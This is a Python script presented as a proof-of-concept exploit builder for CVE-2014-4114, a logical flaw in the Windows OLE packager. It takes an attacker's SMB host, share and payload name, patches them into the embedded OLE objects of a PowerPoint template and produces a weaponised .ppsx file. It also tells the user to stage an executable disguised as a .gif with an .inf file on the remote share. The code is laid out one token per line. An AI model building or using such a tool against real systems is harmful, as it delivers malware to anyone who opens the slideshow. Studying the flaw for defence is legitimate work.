import
os
import
zipfile
import
sys
host
=
sys.argv[
1
]
share
=
sys.argv[
2
]
mal_file
=
sys.argv[
3
]
print
"\nPoC exploit builder v0.1 for logical OLE flaw in packager.dll [CVE-2014-4114] by vlad@sensepost.com @v1ad_o\n"
print
"Building ... \n "
mal_file
=
mal_file.replace(
' '
, '')[:
-
4
].lower()
fh
=
open
(
'expl.zip'
,
'rb'
)
z
=
zipfile.ZipFile(fh)
for
name
in
z.namelist():
outpath
=
"./tmp"
z.extract(name, outpath)
fh.close()
os.mkdir(
'out'
)
os.chdir(
'tmp'
)
infile
=
open
(
'ppt/embeddings/oleObject1.bin'
)
outfile
=
open
(
'ppt/embeddings/1.bin'
,
'w'
)
replacements
=
{
'10.0.0.34'
:host,
'public'
:share,
'slide1.gif'
:mal_file
+
'.gif'
}
for
line
in
infile:
for
src, target
in
replacements.iteritems():
line
=
line.replace(src, target)
outfile.write(line)
infile.close()
outfile.close()
os.remove (
'ppt/embeddings/oleObject1.bin'
)
os.rename (
'ppt/embeddings/1.bin'
,
'ppt/embeddings/oleObject1.bin'
)
infile
=
open
(
'ppt/embeddings/oleObject2.bin'
)
outfile
=
open
(
'ppt/embeddings/2.bin'
,
'w'
)
replacements
=
{
'10.0.0.34'
:host,
'public'
:share,
'slide1.inf'
:mal_file
+
'.inf'
}
for
line
in
infile:
for
src, target
in
replacements.iteritems():
line
=
line.replace(src, target)
outfile.write(line)
infile.close()
outfile.close()
os.remove (
'ppt/embeddings/oleObject2.bin'
)
os.rename (
'ppt/embeddings/2.bin'
,
'ppt/embeddings/oleObject2.bin'
)
os.system(
"zip -q -9 -r ../out/exploit.ppsx * "
)
os.chdir(
'..'
)
infile
=
open
(
'expl.inf'
)
outfile
=
open
(
'out/'
+
mal_file
+
'.inf'
,
'w'
)
replacements
=
{
'slide1'
:mal_file}
for
line
in
infile:
for
src, target
in
replacements.iteritems():
line
=
line.replace(src, target)
outfile.write(line)
infile.close()
outfile.close()
os.system(
"rm -rf tmp"
)
print
'Copy the .inf .gif (renamed file.exe=>file.gif) to:\n'
print
'*\\\\'+host +'
\\
'+ share +'
\\
'+ mal_file+'
.gif\n'
print
'*\\\\'+host +'
\\
'+ share +'
\\
'+ mal_file+'
.inf\n'
print
'Done - collect your files from the [out] folder.\n'